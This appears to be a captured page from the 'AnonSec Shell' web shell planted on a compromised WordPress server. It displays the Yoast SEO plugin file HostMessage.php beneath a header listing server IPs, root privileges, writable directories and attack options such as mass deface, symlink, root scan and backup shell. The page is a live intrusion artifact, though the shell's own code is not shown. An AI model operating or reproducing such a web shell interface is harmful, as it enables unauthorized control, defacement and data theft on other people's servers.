AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 13.58.139.190   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Messages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Messages/HostMessage.php
<?php

namespace Yoast\WHIPv2\Messages;

use Yoast\WHIPv2\Host;
use Yoast\WHIPv2\Interfaces\Message;
use Yoast\WHIPv2\MessageFormatter;

/**
 * Class HostMessage.
 */
class HostMessage implements Message {

	/**
	 * Text domain to use for translations.
	 *
	 * @var string
	 */
	private $textdomain;

	/**
	 * The environment key to use to retrieve the message from.
	 *
	 * @var string
	 */
	private $messageKey;

	/**
	 * Message constructor.
	 *
	 * @param string $messageKey The environment key to use to retrieve the message from.
	 * @param string $textdomain The text domain to use for translations.
	 */
	public function __construct( $messageKey, $textdomain ) {
		$this->textdomain = $textdomain;
		$this->messageKey = $messageKey;
	}

	/**
	 * Retrieves the message body.
	 *
	 * @return string The message body.
	 */
	public function body() {
		$message = array();

		$message[] = MessageFormatter::strong( $this->title() ) . '<br />';
		$message[] = MessageFormatter::paragraph( Host::message( $this->messageKey ) );

		return \implode( "\n", $message );
	}

	/**
	 * Renders the message title.
	 *
	 * @return string The message title.
	 */
	public function title() {
		/* translators: 1: name. */
		return \sprintf( \__( 'A message from %1$s', $this->textdomain ), Host::name() );
	}
}

Anon7 - 2022
AnonSec Team